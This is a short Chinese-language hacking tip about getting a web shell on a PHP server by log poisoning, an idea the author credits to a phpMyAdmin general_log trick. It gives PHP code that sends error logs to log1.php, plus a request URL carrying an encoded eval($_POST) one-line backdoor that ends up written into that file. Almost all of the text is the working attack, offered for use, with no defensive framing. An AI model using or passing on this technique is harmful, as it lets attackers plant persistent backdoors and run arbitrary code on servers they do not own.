思路呢来源于phpmyadmin，可以开启general_log，然后设置general_log_file为一个php文件，最后用一句话木马进行查询来获取shell，

PHP也是可以开户日志记录的。具体操作如下。

随便找个PHP文件，比如a.php，加上如下代码

<?php
error_reporting(E_ALL);
ini_set("log_errors", "On");
ini_set("error_log","log1.php");
$arr=array();
var_dump($arr[$_REQUEST['x']]);
?>

然后怎么用呢，直接提交
http://www.xxxx.com/a.php?x=<%3fphp+eval(%40%24_POST%5b%27a%27%5d)%3b+%3f>
OK。再根目录下就可以看到log1.php一句话木马文件了。